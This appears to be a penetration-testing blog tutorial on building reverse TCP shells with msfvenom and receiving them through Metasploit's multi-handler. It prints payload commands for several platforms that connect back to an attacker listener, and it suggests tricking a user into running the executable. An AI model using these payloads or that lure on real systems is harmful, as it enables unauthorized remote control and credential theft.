Thilan Dissanayaka Penetration Testing Mar 23

Reverse TCP shell with Metasploit

Metasploit is a powerful penetration testing framework that automates exploit development, generates shellcode, and acts as a listener for incoming connections. This tutorial introduces how to create a reverse TCP shell using Metasploit’s msfvenom tool and handle the resulting session with the Metasploit Framework. We’ll cover the differences between reverse and bind shells, explain key components like the multi-handler and Meterpreter, and provide step-by-step instructions for generating and launching a reverse TCP shell.

Reverse TCP vs. Bind Shell

Both reverse TCP and bind shells enable remote access to a victim’s system, but they differ in the direction of the connection.

  • Reverse TCP Shell: The victim machine initiates a connection to the attacker’s machine, which listens on a specified host (LHOST) and port (LPORT). This is useful when the victim is behind a firewall or NAT, as outbound connections are often allowed. The attacker’s machine runs a listener, such as Metasploit’s multi-handler, to receive the connection and provide a shell for controlling the victim system.

  • Bind Shell: The victim machine runs a listening program on a specific port, and the attacker connects to it. This requires the victim’s firewall to allow incoming connections, which is less common in restricted environments.

Key Difference: In a reverse shell, the victim connects to the attacker; in a bind shell, the attacker connects to the victim.

Key Metasploit Components

What is the Multi-Handler?

The Metasploit multi-handler is an exploit module that manages multiple incoming connections from payloads executed on victim machines. It’s commonly used with reverse TCP payloads, such as windows/meterpreter/reverse_tcp. When a victim connects, the multi-handler assigns a session ID, allowing the attacker to interact with the victim using Meterpreter commands, switch between sessions, or manage multiple sessions simultaneously.

What is Meterpreter?

Meterpreter is a versatile post-exploitation payload within Metasploit. Delivered via an exploit, it provides a powerful command shell with features like:

  • Capturing screenshots
  • Stealing credentials
  • Manipulating files
  • Pivoting to other systems
  • Evading antivirus detection
  • Spawning additional sessions or migrating processes

In this tutorial, we’ll use Meterpreter as the payload for our reverse TCP shell.

What are LHOST and LPORT?

  • LHOST: The IP address of the attacker’s machine, where the listener (e.g., multi-handler) waits for the victim’s connection.
  • LPORT: The port on the attacker’s machine that the victim connects to.

These parameters are critical for configuring the reverse TCP connection.

Generating a Reverse TCP Shell with Msfvenom

msfvenom is a Metasploit tool for creating customized payloads for various platforms, architectures, and formats. It supports exploits like buffer overflows, command injections, and remote code execution, and can generate reverse shells or Meterpreter sessions.

Basic Syntax

Here’s an example of generating a PHP-based reverse TCP shell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=555 -o shell.php
  • -p: Specifies the payload (e.g., php/meterpreter_reverse_tcp).
  • -o: Defines the output file (e.g., shell.php).
  • LHOST: The attacker’s IP address.
  • LPORT: The port the attacker listens on.

To list available payloads, use:

msfvenom --list payloads

Payloads for Different Platforms

Below are examples of generating reverse TCP shells for various systems:

Web Servers (PHP)

For a PHP-based web server:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=555 -o shell.php

Web Servers (JSP)

For a JSP-based server:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=555 -o shell.jsp

Linux Servers

For a Linux system:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=555 -o shell.elf

Windows Servers

For a Windows system:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=555 -o shell.exe

Android Devices

For an Android device:

msfvenom -p android/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=555 -o shell.apk

Setting Up the Multi-Handler

To receive the reverse TCP connection, configure the Metasploit multi-handler:

  1. Start Metasploit:

    msfconsole

  2. Select the Multi-Handler:

    use exploit/multi/handler

  3. Set the Payload: Match the payload used in msfvenom. For example:

    set payload windows/meterpreter/reverse_tcp

  4. Configure LHOST and LPORT: Set the attacker’s IP and port:

    set LHOST 192.168.56.1
set LPORT 555

  5. Check Options: Verify the configuration:

    show options

  6. Start the Listener: Launch the multi-handler to wait for incoming connections:

    run

Launching the Exploit

  1. Deploy the Payload: Upload or execute the generated payload (e.g., shell.php, shell.exe, or shell.apk) on the victim machine. For example, upload shell.php to a vulnerable web server or trick a user into running shell.exe.

  2. Wait for Connection: Once the payload executes, the victim machine connects to the attacker’s LHOST and LPORT. The multi-handler establishes a Meterpreter session, allowing the attacker to:

    • Run commands (e.g., sysinfo, getuid)
    • Capture screenshots (screenshot)
    • Upload/download files (upload, download)
    • Pivot to other systems

  3. Interact with the Session: Use Meterpreter commands to control the victim machine. List active sessions with:

    sessions

    Interact with a specific session using:

    sessions -i <session_id>

Conclusion

Metasploit’s msfvenom and multi-handler make it straightforward to create and manage reverse TCP shells for penetration testing. By generating platform-specific payloads and configuring the listener with the correct LHOST and LPORT, you can establish Meterpreter sessions to control compromised systems. Whether targeting web servers, Linux, Windows, or Android devices, Metasploit provides a flexible and powerful framework for ethical hacking and security research. Future tutorials will explore additional Metasploit features and partner tools to deepen your penetration testing skills.

ALSO READ
Adapter Pattern explained simply
Apr 26 Software Architecture
Adapter Pattern explained simply

Ever needed to connect two incompatible interfaces without changing their source code? That’s exactly where the **Adapter Pattern** shines! The Adapter Pattern is a structural design pattern....

Build A Simple Web shell
Mar 23 Application Security
Build A Simple Web shell

A web shell is a type of code that hackers use to gain control over a web server. It is particularly useful for post-exploitation attacks, and there are various types of web shells available. Some of....

Abstract Factory Pattern explained simply
Apr 26 Software Architecture
Abstract Factory Pattern explained simply

When you want to create **families of related objects** without specifying their concrete classes, the **Abstract Factory Pattern** is your best friend. --- ## What is the Abstract Factory....

Netcat The Hacker's Swiss Army Knife
May 02 Penetration Testing
Netcat The Hacker's Swiss Army Knife

Netcat, often abbreviated as `nc`, is a versatile command-line networking tool that can be used for almost anything related to TCP, UDP, or UNIX-domain sockets. It's beloved by network engineers,....

SSRF - Server Side Request Forgery
May 27 Application Security
SSRF - Server Side Request Forgery

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's....

Introduction to Edge Computing
Mar 23 Computing Concepts
Introduction to Edge Computing

Edge computing is a distributed computing paradigm where computation and data storage are performed closer to the location where it is needed. Instead of relying solely on a centralized data center,....

ABOUT

Dive deep into the fascinating world of cybersecurity — where knowledge is power, and every byte matters.

Explore expertly written articles on system exploitation, web application hacking, exploit development, malware analysis, cryptography, and more.

CATEGORIES